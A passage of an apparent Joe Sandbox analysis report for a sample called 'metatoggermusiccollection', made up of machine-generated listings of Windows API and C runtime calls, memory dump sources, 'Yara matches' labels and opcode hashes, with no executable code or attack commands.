                                                                              • Part of subcall function 02AE8442: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 02AE926D
                                                                              • Part of subcall function 02AE8442: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 02AE9280
                                                                              • Part of subcall function 02AE8442: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 02AE9293
                                                                              • Part of subcall function 02AE8442: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 02AE92A6
                                                                              • Part of subcall function 02AE8442: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 02AE92B9
                                                                              • Part of subcall function 02AE8442: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 02AE92CC
                                                                              • Part of subcall function 02AE8442: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 02AE92DF
                                                                            • __mtinitlocks.LIBCMT ref: 02AE5CD9
                                                                            • __mtterm.LIBCMT ref: 02AE5CE2
                                                                              • Part of subcall function 02AE5D4A: RtlDeleteCriticalSection.NTDLL(00000000), ref: 02AE8878
                                                                              • Part of subcall function 02AE5D4A: _free.LIBCMT ref: 02AE887F
                                                                              • Part of subcall function 02AE5D4A: RtlDeleteCriticalSection.NTDLL(02B03978), ref: 02AE88A1
                                                                            • __calloc_crt.LIBCMT ref: 02AE5D07
                                                                            • __initptd.LIBCMT ref: 02AE5D29
                                                                            • GetCurrentThreadId.KERNEL32 ref: 02AE5D30
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                            • String ID:
                                                                            • API String ID: 3567560977-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,02AE33B6,00000000), ref: 02AE341E
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02AE3425
                                                                            • RtlEncodePointer.NTDLL(00000000), ref: 02AE3431
                                                                            • RtlDecodePointer.NTDLL(00000001), ref: 02AE344E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                            • String ID: RoInitialize$combase.dll
                                                                            • API String ID: 3489934621-340411864
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,02AE33F3), ref: 02AE34F3
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02AE34FA
                                                                            • RtlEncodePointer.NTDLL(00000000), ref: 02AE3505
                                                                            • RtlDecodePointer.NTDLL(02AE33F3), ref: 02AE3520
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                            • String ID: RoUninitialize$combase.dll
                                                                            • API String ID: 3489934621-2819208100
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • TlsGetValue.KERNEL32(00000025,3156A85A,?,?,?,?,00000000,02AF69F8,000000FF,02AE210A), ref: 02AE1EAA
                                                                            • TlsSetValue.KERNEL32(00000025,02AE210A,?,?,00000000), ref: 02AE1F17
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02AE1F41
                                                                            • HeapFree.KERNEL32(00000000), ref: 02AE1F44
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: HeapValue$FreeProcess
                                                                            • String ID:
                                                                            • API String ID: 1812714009-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • _ValidateScopeTableHandlers.LIBCMT ref: 02AF56D0
                                                                            • __FindPESection.LIBCMT ref: 02AF56EA
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FindHandlersScopeSectionTableValidate
                                                                            • String ID:
                                                                            • API String ID: 876702719-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetStringTypeW.KERNEL32(00000001,004065FC,00000001,00000000,00000103,00000001,00000000,00404E93,00200020,00000000,?,00000000,00000000,00000001), ref: 00405DAD
                                                                            • GetStringTypeA.KERNEL32(00000000,00000001,004065F8,00000001,?,?,00000000,00000000,00000001), ref: 00405DC7
                                                                            • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,00404E93,00200020,00000000,?,00000000,00000000,00000001), ref: 00405DFB
                                                                            • MultiByteToWideChar.KERNEL32(00404E93,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,00404E93,00200020,00000000,?,00000000,00000000,00000001), ref: 00405E33
                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405E89
                                                                            • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405E9B
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: StringType$ByteCharMultiWide
                                                                            • String ID:
                                                                            • API String ID: 3852931651-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02AD1CB1
                                                                            • CloseHandle.KERNEL32(?), ref: 02AD1CBA
                                                                            • InterlockedExchangeAdd.KERNEL32(02B07244,00000000), ref: 02AD1CC6
                                                                            • TerminateThread.KERNEL32(?,00000000), ref: 02AD1CD4
                                                                            • QueueUserAPC.KERNEL32(02AD1E7C,?,00000000), ref: 02AD1CE1
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02AD1CEC
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Wait$CloseExchangeHandleInterlockedMultipleObjectObjectsQueueSingleTerminateThreadUser
                                                                            • String ID:
                                                                            • API String ID: 1946104331-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 02AD9A0C: __EH_prolog.LIBCMT ref: 02AD9A11
                                                                              • Part of subcall function 02AD9A0C: _Allocate.LIBCPMT ref: 02AD9A68
                                                                              • Part of subcall function 02AD9A0C: _memmove.LIBCMT ref: 02AD9ABF
                                                                            • _memset.LIBCMT ref: 02AE0879
                                                                            • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 02AE08E2
                                                                            • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 02AE08EA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateErrorFormatH_prologLastMessage_memmove_memset
                                                                            • String ID: Unknown error$invalid string position
                                                                            • API String ID: 1854462395-1837348584
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetVersionExA.KERNEL32 ref: 00403131
                                                                            • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00403166
                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004031C6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: EnvironmentFileModuleNameVariableVersion
                                                                            • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                            • API String ID: 1385375860-4131005785
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • std::exception::exception.LIBCMT ref: 02AE18BF
                                                                              • Part of subcall function 02AE2413: std::exception::_Copy_str.LIBCMT ref: 02AE242C
                                                                              • Part of subcall function 02AE0C90: __CxxThrowException@8.LIBCMT ref: 02AE0CEE
                                                                            • std::exception::exception.LIBCMT ref: 02AE191E
                                                                            Strings
                                                                            • boost unique_lock has no mutex, xrefs: 02AE18AE
                                                                            • $, xrefs: 02AE1923
                                                                            • boost unique_lock owns already the mutex, xrefs: 02AE190D
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: std::exception::exception$Copy_strException@8Throwstd::exception::_
                                                                            • String ID: $$boost unique_lock has no mutex$boost unique_lock owns already the mutex
                                                                            • API String ID: 2140441600-46888669
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • __getptd_noexit.LIBCMT ref: 02AE49C0
                                                                              • Part of subcall function 02AE5BB2: GetLastError.KERNEL32(75920A60,7591F550,02AE5DA0,02AE2F73,7591F550,?,02AD606D,00000104,75920A60,7591F550,ntdll.dll,?,?,?,02AD6504), ref: 02AE5BB4
                                                                              • Part of subcall function 02AE5BB2: __calloc_crt.LIBCMT ref: 02AE5BD5
                                                                              • Part of subcall function 02AE5BB2: __initptd.LIBCMT ref: 02AE5BF7
                                                                              • Part of subcall function 02AE5BB2: GetCurrentThreadId.KERNEL32 ref: 02AE5BFE
                                                                              • Part of subcall function 02AE5BB2: SetLastError.KERNEL32(00000000,02AD606D,00000104,75920A60,7591F550,ntdll.dll,?,?,?,02AD6504), ref: 02AE5C16
                                                                            • __calloc_crt.LIBCMT ref: 02AE49E3
                                                                            • __get_sys_err_msg.LIBCMT ref: 02AE4A01
                                                                            • __invoke_watson.LIBCMT ref: 02AE4A1E
                                                                            Strings
                                                                            • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 02AE49CB, 02AE49F1
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast__calloc_crt$CurrentThread__get_sys_err_msg__getptd_noexit__initptd__invoke_watson
                                                                            • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                            • API String ID: 109275364-798102604
                                                                            • Opcode ID: 115c986498ed13856a207228dd6faff01651b3fe0933a07cd05471e8d85ff7dc
                                                                            • Instruction ID: 3a181e75b68e17ecb1fcbf22de5ea033dd4eb86a921ecd590df5fd7e32a7e73c
                                                                            • Opcode Fuzzy Hash: 115c986498ed13856a207228dd6faff01651b3fe0933a07cd05471e8d85ff7dc
                                                                            • Instruction Fuzzy Hash: B7F05932A847052FEE216A5A5D8063B729DEB98AA4B000526FB87FB200EF25CC034795
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02AD2350
                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02AD2360
                                                                            • PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02AD2370
                                                                            • GetLastError.KERNEL32 ref: 02AD237A
                                                                              • Part of subcall function 02AD1712: __EH_prolog.LIBCMT ref: 02AD1717
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExchangeInterlocked$CompletionErrorH_prologLastPostQueuedStatus
                                                                            • String ID: pqcs
                                                                            • API String ID: 1619523792-2559862021
                                                                            • Opcode ID: 1e1162873c71d6b9700b93ba66adf4f92e90d677a0a8960bf06d1b01b8a11919
                                                                            • Instruction ID: 7dbc9c51be320de7c48ef70c74854f7147ea0e26d00264ed8fbd161820ca7c99
                                                                            • Opcode Fuzzy Hash: 1e1162873c71d6b9700b93ba66adf4f92e90d677a0a8960bf06d1b01b8a11919
                                                                            • Instruction Fuzzy Hash: 22F03070980304ABDB10AFB49D49BABB7BCEF00701F00456AE906D3540EF74D915CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02AD4035
                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02AD4042
                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02AD4049
                                                                            • std::exception::exception.LIBCMT ref: 02AD4063
                                                                              • Part of subcall function 02ADA5FD: __EH_prolog.LIBCMT ref: 02ADA602
                                                                              • Part of subcall function 02ADA5FD: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02ADA611
                                                                              • Part of subcall function 02ADA5FD: __CxxThrowException@8.LIBCMT ref: 02ADA630
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prologHeap$AllocateConcurrency::cancellation_token::_Exception@8FromImplProcessThrowstd::exception::exception
                                                                            • String ID: bad allocation
                                                                            • API String ID: 3112922283-2104205924
                                                                            • Opcode ID: a6bf1cdacf8829b738e8e98a38cd5bf2c545fe561faca14735ffc2749302783a
                                                                            • Instruction ID: 60a3f026d0b6184e6219b603a93bd1f02020a71bd2a84ef64f12848ab7709171
                                                                            • Opcode Fuzzy Hash: a6bf1cdacf8829b738e8e98a38cd5bf2c545fe561faca14735ffc2749302783a
                                                                            • Instruction Fuzzy Hash: 66F05E72D44209ABCB40EFE0CD04BAFB779EF04301F804555FA15A2640DF3C82158F51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetStartupInfoA.KERNEL32(?), ref: 0040489B
                                                                            • GetFileType.KERNEL32(00000800), ref: 00404941
                                                                            • GetStdHandle.KERNEL32(-000000F6), ref: 0040499A
                                                                            • GetFileType.KERNEL32(00000000), ref: 004049A8
                                                                            • SetHandleCount.KERNEL32 ref: 004049DF
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: FileHandleType$CountInfoStartup
                                                                            • String ID:
                                                                            • API String ID: 1710529072-0
                                                                            • Opcode ID: 56d6159c8425f0dd02e5a81d6ebd8f1304acda9888bee5980fecee2fba5d3342
                                                                            • Instruction ID: 5bba43567eb9c7eebad7166e054eef6f33a3e935d61c9f19950f113686a4cc82
                                                                            • Opcode Fuzzy Hash: 56d6159c8425f0dd02e5a81d6ebd8f1304acda9888bee5980fecee2fba5d3342
                                                                            • Instruction Fuzzy Hash: 585124F25003118BD7208B38CD48B673BA0EB91331F19873AE696BB2E1D738C855875A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 02AE1990: CloseHandle.KERNEL32(00000000,3156A85A), ref: 02AE19E1
                                                                              • Part of subcall function 02AE1990: WaitForSingleObject.KERNEL32(?,000000FF,3156A85A,?,?,?,?,3156A85A,02AE1963,3156A85A), ref: 02AE19F8
                                                                            • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02AE1C5E
                                                                            • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02AE1C7E
                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 02AE1CB7
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 02AE1D0B
                                                                            • SetEvent.KERNEL32(?), ref: 02AE1D12
                                                                              • Part of subcall function 02AD418C: CloseHandle.KERNEL32(00000000,?,02AE1C45), ref: 02AD41B0
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$ReleaseSemaphore$EventObjectSingleWait
                                                                            • String ID:
                                                                            • API String ID: 4166353394-0
                                                                            • Opcode ID: 00079a8549bcc5584caac04bea91576665b93f8802a63cc6be5eb3748d91b31c
                                                                            • Instruction ID: 9a3523222793f747b1c1c2a5862da2bbad7af594e2ab5e0a61620c91274f23ab
                                                                            • Opcode Fuzzy Hash: 00079a8549bcc5584caac04bea91576665b93f8802a63cc6be5eb3748d91b31c
                                                                            • Instruction Fuzzy Hash: 3041DF706403219FDF25CF28CCC0B1AB7A4EF45724F2406A8EC1ADB295DB35DC528BA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02AD20AC
                                                                            • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02AD20CD
                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02AD20D8
                                                                            • InterlockedDecrement.KERNEL32(?), ref: 02AD213E
                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02AD21A6
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Interlocked$Exchange$DecrementTimerWaitable
                                                                            • String ID:
                                                                            • API String ID: 1611172436-0
                                                                            • Opcode ID: 9fc5002435d2cbabab74f8ef793dd0a3bb9b608494895ba637a77dff6fb8b5b2
                                                                            • Instruction ID: 2ba9bf259d11c37f2aff05428b0aa798ec93d1dd9f08f611d8a787128259b082
                                                                            • Opcode Fuzzy Hash: 9fc5002435d2cbabab74f8ef793dd0a3bb9b608494895ba637a77dff6fb8b5b2
                                                                            • Instruction Fuzzy Hash: 7A316972544701AFC311DF65D884A6BF7F9EFC8A14F104A1EF99A83651DB30E90ACB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02ADE030
                                                                              • Part of subcall function 02AD1A01: TlsGetValue.KERNEL32 ref: 02AD1A0A
                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02ADE0AF
                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02ADE0CB
                                                                            • InterlockedIncrement.KERNEL32(02B05180), ref: 02ADE0F0
                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02ADE105
                                                                              • Part of subcall function 02AD27F3: SetWaitableTimer.KERNEL32(00000000,?,000493E0,00000000,00000000,00000000,00000000,00000000,0000000A,00000000), ref: 02AD284E
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalInterlockedSection$EnterExchangeH_prologIncrementLeaveTimerValueWaitable
                                                                            • String ID:
                                                                            • API String ID: 1578506061-0
                                                                            • Opcode ID: 3c146dc9062a9396243d4e4fb6644267ff2b63cd124b5f3c15fa2163f1c22054
                                                                            • Instruction ID: 57e8df93ad94c3b959f532a2f5260633bfe47a2ed5c553e2f05fb0c70445e7cc
                                                                            • Opcode Fuzzy Hash: 3c146dc9062a9396243d4e4fb6644267ff2b63cd124b5f3c15fa2163f1c22054
                                                                            • Instruction Fuzzy Hash: AC3149B1941204DFC750DFA8CA44AAEBBF9BF08310F14455EE94AD7640EB35AA05CFA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • _malloc.LIBCMT ref: 02AF02F0
                                                                              • Part of subcall function 02AE2EEC: __FF_MSGBANNER.LIBCMT ref: 02AE2F03
                                                                              • Part of subcall function 02AE2EEC: __NMSG_WRITE.LIBCMT ref: 02AE2F0A
                                                                              • Part of subcall function 02AE2EEC: RtlAllocateHeap.NTDLL(00780000,00000000,00000001), ref: 02AE2F2F
                                                                            • _free.LIBCMT ref: 02AF0303
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateHeap_free_malloc
                                                                            • String ID:
                                                                            • API String ID: 1020059152-0
                                                                            • Opcode ID: f4785279610af9499d609b2e5788f05b0bfaadd12db9620b82c301c89bf8f483
                                                                            • Instruction ID: 29e55d389809ab93118dcb02d023796e4a7d04359dd97b2175aa6927674b8a9e
                                                                            • Opcode Fuzzy Hash: f4785279610af9499d609b2e5788f05b0bfaadd12db9620b82c301c89bf8f483
                                                                            • Instruction Fuzzy Hash: 9411EB32D88311ABDF612FF0BD8875A37999F00364F000A55FB068B155EF38C451CA90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02AD21DA
                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02AD21ED
                                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000001), ref: 02AD2224
                                                                            • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,00000001), ref: 02AD2237
                                                                            • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02AD2261
                                                                              • Part of subcall function 02AD2341: InterlockedExchange.KERNEL32(?,00000001), ref: 02AD2350
                                                                              • Part of subcall function 02AD2341: InterlockedExchange.KERNEL32(?,00000001), ref: 02AD2360
                                                                              • Part of subcall function 02AD2341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02AD2370
                                                                              • Part of subcall function 02AD2341: GetLastError.KERNEL32 ref: 02AD237A
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                            • String ID:
                                                                            • API String ID: 1856819132-0
                                                                            • Opcode ID: ff08506bc12073621df0e42cd1311d0c4a883ad8911627e6f37035c6cee60ec6
                                                                            • Instruction ID: f0b96cf6c7c901f944c3787d63c0d260d6f265e876ed9fa655ac1867189edbad
                                                                            • Opcode Fuzzy Hash: ff08506bc12073621df0e42cd1311d0c4a883ad8911627e6f37035c6cee60ec6
                                                                            • Instruction Fuzzy Hash: 2D117F71D44118DBCB01AFA4DD44BAEFBBAFF58310F00455AF916A3261DF758662DB80
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02AD229D
                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02AD22B0
                                                                            • TlsGetValue.KERNEL32 ref: 02AD22E7
                                                                            • TlsSetValue.KERNEL32(?), ref: 02AD2300
                                                                            • TlsSetValue.KERNEL32(?,?,?), ref: 02AD231C
                                                                              • Part of subcall function 02AD2341: InterlockedExchange.KERNEL32(?,00000001), ref: 02AD2350
                                                                              • Part of subcall function 02AD2341: InterlockedExchange.KERNEL32(?,00000001), ref: 02AD2360
                                                                              • Part of subcall function 02AD2341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02AD2370
                                                                              • Part of subcall function 02AD2341: GetLastError.KERNEL32 ref: 02AD237A
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                            • String ID:
                                                                            • API String ID: 1856819132-0
                                                                            • Opcode ID: 3f8467ec4e6aea73df4e3dd57e461a1fbd96747e079e41b8c7cb61df6a3c3b9c
                                                                            • Instruction ID: 986974569216f3ad5edcd652fc1b85b4a96192d5d914c31006541f1bf2d3eb27
                                                                            • Opcode Fuzzy Hash: 3f8467ec4e6aea73df4e3dd57e461a1fbd96747e079e41b8c7cb61df6a3c3b9c
                                                                            • Instruction Fuzzy Hash: DF115EB1D40218DBCB02AFA5DD44AAEFFBAFF58310F00455AE805A3210DF759A62DF90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 02ADB098: __EH_prolog.LIBCMT ref: 02ADB09D
                                                                            • __CxxThrowException@8.LIBCMT ref: 02ADBC62
                                                                              • Part of subcall function 02AE449A: RaiseException.KERNEL32(?,?,02ADFA92,?,?,?,?,?,?,?,02ADFA92,?,02B00F78,?), ref: 02AE44EF
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,02B01D94,?,00000001), ref: 02ADBC78
                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02ADBC8B
                                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000001,00000000,?,?,?,02B01D94,?,00000001), ref: 02ADBC9B
                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02ADBCA9
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
